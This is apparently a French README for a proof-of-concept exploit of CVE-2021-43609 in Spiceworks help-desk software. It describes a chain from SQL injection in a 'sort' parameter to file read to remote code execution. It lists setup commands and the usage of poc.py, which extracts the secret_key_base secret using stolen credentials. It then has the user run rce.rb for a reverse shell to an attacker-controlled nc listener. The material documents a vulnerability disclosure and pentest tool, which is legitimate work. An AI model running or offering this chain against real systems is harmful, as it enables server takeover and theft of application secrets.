
Exploit de preuve de concept pour CVE-2021-43609 démontrant une chaîne d'injection SQL à lecture de fichier à exécution de code à distance contre le logiciel d'assistance Spiceworks.
Il y a une injection SQL dans un paramètre sort de Spiceworks. La chaîne complète d'exploitation est injection SQL -> lecture de fichier -> exécution de code à distance (RCE).
apt update && apt install -y ruby-dev nodejs python3 python3-pip libsqlite3-dev
pip3 install requests
gem install bundler && cd rce && bundle install
Utilisez poc.py pour exploiter l'injection SQL -> lecture de fichier et extraire la variable d'environnement secret_key_base. Il générera ensuite un script ruby de preuve de concept (PoC) pour obtenir un reverse shell, avec les valeurs obtenues depuis poc.py.
usage: poc.py [-h] --rhost RHOST --lhost LHOST --lport LPORT -u USER -p PASSWORD [-e ENV_PATH]
Il y a une injection SQL dans un paramètre `sort` de Spiceworks. La chaîne d'exploitation est injection SQL -> lecture de fichier -> RCE.
arguments optionnels :
-h, --help affiche ce message d'aide et quitte
--rhost RHOST https://example.com
--lhost LHOST 10.10.10.10
--lport LPORT 9001
-u USER, --user USER [email protected]
-p PASSWORD, --password PASSWORD
P@$$w0rd!
-e ENV_PATH, --env_path ENV_PATH
Chemin vers les variables d'environnement
Utilisez rce.rb. Démarrez un écouteur nc sur l'IP et le port que vous avez fournis à l'étape 1, puis simplement :
cd rce && ruby rce.rb
Voila!